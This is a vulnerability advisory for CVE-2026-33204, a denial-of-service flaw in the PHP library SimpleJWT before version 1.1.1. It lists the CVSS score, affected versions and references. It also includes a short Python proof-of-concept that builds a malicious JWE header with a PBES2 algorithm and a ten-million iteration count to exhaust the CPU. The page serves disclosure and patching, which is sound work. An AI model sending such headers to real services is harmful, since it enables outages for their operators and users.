Security Vulnerability Report
CVE-2026-33204 CVSS 7.5 HIGH

Published: 2026-03-20 23:16:46
Last Modified: 2026-04-10 01:25:08

Description

SimpleJWT is a simple JSON web token library written in PHP. Prior to version 1.1.1, an unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used. Applications that call JWE::decrypt() on attacker-controlled JWEs using PBES2 algorithms are affected. This issue has been patched in version 1.1.1.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Weakness
CWE-400

Configurations (Affected Products)

cpe:2.3:a:kelvinmo:simplejwt:*:*:*:*:*:*:*:* - VULNERABLE
SimpleJWT < 1.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC: Malicious JWE Header Generation
# This script demonstrates how to create a JWE header with a high iteration count (p2c)
# to trigger the DoS condition in vulnerable SimpleJWT versions.
import json
import base64


def malicious_jwe_header():
    # Define the header with PBES2 algorithm and a very high p2c (iteration count)
    header = {
        "alg": "PBES2-HS256+A128KW",
        "enc": "A128CBC-HS256",
        "p2c": 10000000,  # High iteration count to cause CPU exhaustion
    }
    # Encode to Base64URL
    header_json = json.dumps(header, separators=(',', ':'))
    header_b64 = base64.urlsafe_b64encode(header_json.encode()).decode().rstrip('=')
    print(f"Malicious JWE Header: {header_b64}")
    return header_b64


if __name__ == "__main__":
    malicious_jwe_header()
```

References

https://github.com/kelvinmo/simplejwt/releases/tag/v1.1.1 (Product, Release Notes)
https://github.com/kelvinmo/simplejwt/security/advisories/GHSA-xw36-67f8-339x (Exploit, Vendor Advisory)